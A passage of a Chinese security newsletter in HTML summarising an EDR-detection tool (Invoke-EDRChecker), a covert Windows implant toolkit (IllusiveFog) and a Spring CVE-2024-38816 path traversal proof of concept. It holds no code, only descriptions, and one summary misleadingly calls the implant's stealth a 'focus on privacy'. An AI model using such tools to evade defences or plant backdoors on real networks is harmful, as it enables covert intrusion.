		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了一个用于识别常见端点检测和响应（EDR）进程、目录和服务的工具Invoke-EDRChecker的简单背景信息和功能。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5883476599808978" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1047" src="https://wechat2rss.xlab.app/img-proxy/?k=0ab46559&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKusILzd4RSPlLNGbhslLZgsYic32Ujx9cPcNSHiclWIibLl2FFReO2vkBMg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR 检测工具：Invoke-EDRChecker</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">识别 EDR 进程、目录和服务：Invoke-EDRChecker 简易 BOF</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuDRJV8AuqpYTu4iaVwEDCuTJo9coCDIFryiapX0fdMSdE3ian0icuSvgYPg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuDRJV8AuqpYTu4iaVwEDCuTJo9coCDIFryiapX0fdMSdE3ian0icuSvgYPg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121514185112184"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Invoke-EDRChecker 是一个用于识别EDR软件的工具，它能够检测EDR相关的进程、目录和服务。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具是对开源项目Invoke-EDRChecker的扩展，提供了额外的功能或改进。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网页强调了识别EDR软件的重要性，这对于维护系统安全和进行安全研究至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过提供对原始项目的引用，网页鼓励用户了解和使用开源工具，同时也提供了进一步学习和研究的资源。</section></li></ul>
	<br/>
	<p>🏷️: EDR, Invoke-EDRChecker, 网络安全, 进程识别, 服务识别</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x13
			 基于Socks5代理的Windows管理员级植入工具包</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">IllusiveFog 是一个基于 Socks5 Proxy 的 Windows 高级植入工具包，用纯 Python 2.7、C 和 C++ 编写，旨在为 Microsoft Windows 网络提供长期隐蔽的访问和侦察功能。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.9527777777777777" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9654b8b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKurEqnZdDOev7L5V1hVgVXNPGuJRLMKqL4HUep47QvKeSib8Wiba3pGqTQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IllusiveFog：一款用于 Windows 网络的隐蔽植入工具</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows 管理员级别后门植入</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKutiaWwVicv6NSBdm6N1sMVpnayHhiapX9gE9KTeg5tfHsHpBAVyGRFsJSA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKutiaWwVicv6NSBdm6N1sMVpnayHhiapX9gE9KTeg5tfHsHpBAVyGRFsJSA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121514185528224"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全与隐私：IllusiveFog 的设计侧重于长期和隐蔽地维持对 Windows 网络的访问，显示了对隐私和安全性的重视。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">教育目的：项目创建者强调该工具的教育价值，鼓励用户通过学习 Windows 内部和检测机制来提升自身技能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开源精神与责任：IllusiveFog 作为一个开源项目，遵循 MIT 许可证，同时明确表示创建者不对项目的使用负责，强调用户的责任。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">技术挑战：项目可能包含需要反向工程的代码部分，这为研究人员和爱好者提供了技术挑战，同时也可能作为对手的一种防御机制。</section></li></ul>
	<br/>
	<p>🏷️: Socks5, Windows, 植入工具, Python, C++</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x14
			 CVE-2024-38816 路径遍历漏洞概念验证</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">CVE-2024-38816 网页提供了一个针对 Spring Boot 3.0.13 和 Spring Framework 6.0.3 版本的路径遍历漏洞的概念验证（PoC），通过 Docker 环境演示了漏洞的利用过程，并指出了漏洞的修复版本和可能的成功攻击条件。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=72ac5177&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKumcRHsYkbnKDIDNC4AJjz8HQUuJccCXvEjbsPzviceYFzaLEpd5Y5EgA%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Spring 框架路径遍历漏洞 CVE-2024-38816</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Spring框架发现路径穿越漏洞 CVE-2024-38816</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuGWMsVfmQhRdibopV1n7eAULnM4Pq9vJKwSrDNrNQPPdhKdhoWc7Uyng/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuGWMsVfmQhRdibopV1n7eAULnM4Pq9vJKwSrDNrNQPPdhKdhoWc7Uyng/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858284812288151"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: 